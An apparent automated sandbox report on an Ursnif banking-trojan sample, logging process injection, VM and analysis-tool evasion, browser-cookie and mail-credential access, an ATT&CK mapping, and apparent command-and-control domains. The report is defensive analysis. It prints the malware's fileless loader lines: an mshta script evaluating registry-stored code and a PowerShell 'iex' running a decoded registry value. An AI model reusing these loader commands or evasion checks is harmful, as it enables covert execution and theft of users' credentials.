Source: C:\Windows\System32\wscript.exe TID: 6012	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: explorer.exe, 00000023.00000000.388012712.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000023.00000000.388012712.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: wscript.exe, 00000000.00000002.249397759.00000266D2BC0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.387567320.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000023.00000000.387794052.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000023.00000000.374649672.0000000004E61000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000023.00000000.377103068.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000023.00000000.388012712.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000023.00000000.388012712.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000023.00000000.388119941.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000023.00000000.377201489.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: wscript.exe, 00000000.00000002.249397759.00000266D2BC0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.387567320.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.249397759.00000266D2BC0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.387567320.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.249397759.00000266D2BC0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.387567320.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: onerous.tar.0.dr

Jump to dropped file

Allocates memory in foreign processes

Show sources

Source: C:\Windows\explorer.exe

Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 736E1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 10B2000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 14D0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: 40	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3668
Source: C:\Windows\explorer.exe	Thread register set: target process: 3704
Source: C:\Windows\explorer.exe	Thread register set: target process: 4376
Source: C:\Windows\explorer.exe	Thread register set: target process: 4588
Source: C:\Windows\explorer.exe	Thread register set: target process: 4652
Source: C:\Windows\explorer.exe	Thread register set: target process: 5772

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 10B2000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 14D0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40FFD000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES508E.tmp' 'c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5FA2.tmp' 'c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP'	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000023.00000000.362297301.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000023.00000002.652739698.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000023.00000000.380654097.0000000006860000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000023.00000002.652739698.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000023.00000002.652739698.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\embezzle.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5500, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5500, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation121	DLL Side-Loading1	DLL Side-Loading1	Scripting121	OS Credential Dumping1	File and Directory Discovery2	Remote Services	Data from Local System1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Process Injection812	Obfuscated Files or Information1	Credential API Hooking3	System Information Discovery126	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Non-Application Layer Protocol4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	Security Software Discovery241	Distributed Component Object Model	Input Capture	Scheduled Transfer	Proxy1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell1	Network Logon Script	Network Logon Script	Rootkit4	LSA Secrets	Virtualization/Sandbox Evasion5	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion5	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection812	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\onerous.tar	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Temp\onerous.tar	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\onerous.tar	50%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
c56.lepini.at	12%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	12%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://schemas.microsRD8Et	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
